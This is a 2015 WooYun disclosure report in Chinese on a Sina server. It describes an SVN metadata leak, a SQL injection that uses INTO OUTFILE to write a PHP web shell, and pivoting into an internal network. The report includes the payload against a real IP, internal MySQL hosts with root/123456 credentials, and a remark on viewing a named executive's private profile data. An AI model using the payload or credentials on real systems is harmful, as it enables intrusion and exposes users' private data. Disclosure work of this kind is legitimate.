当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093382

漏洞标题:新浪某处svn信息泄露到getshell到漫游内网,导致微博用户信息泄露(老曹竟然关注xxx)

相关厂商:新浪

漏洞作者: boooooom

提交时间:2015-01-22 16:31

修复时间:2015-03-08 16:32

公开时间:2015-03-08 16:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-22: 厂商已经确认,细节仅向厂商公开
2015-02-01: 细节向核心白帽子及相关领域专家公开
2015-02-11: 细节向普通白帽子公开
2015-02-21: 细节向实习白帽子公开
2015-03-08: 细节向公众公开

简要描述:

RT

详细说明:

首先是一个svn信息泄露

http://218.30.114.228/dashboard/.svn/entries


然后遍历了一下目录,发现一些后台接口

http://218.30.114.228/dashboard/html/list.html
这个是查微博用户特征的
http://218.30.114.228/dashboard/html/cgi/weibo_user_tag.php
http://218.30.114.228/dashboard/html/cgi/user_of_like.php


嗯。按照新浪的习惯,应该来个sql注入,竟然可以写web目录

http://218.30.114.228/dashboard/html/cgi/top.php
level1=1 and 1=2 union select 1,22222222222,3,44444,555555,6666666,77777777,8888888888,111111,0,11,12,13 into outfile '/data0/dashboard/www/dashboard/html/cgi/xxx.php'-- ;&level2=&level3=&level4=&ct=20&listType=0


然后拿shell,稍微进idc看看,一堆mysql弱口令

root 123456 账号密码是这个的以下机器mysql,仅测试。没看数据
10.13.32.21
10.13.49.205
10.13.8.78
10.13.8.79
10.13.8.90
10.13.32.21

漏洞证明:

曹国伟的微博特征

ccc.jpg


曹国伟的博客兴趣特征竟然有这个(怕引起针对个人的媒体炒作,故模糊化处理)

cao.jpg


SHELL

XD.jpg


xx.jpg


修复方案:

修吧,监控也加上

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-22 17:39

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无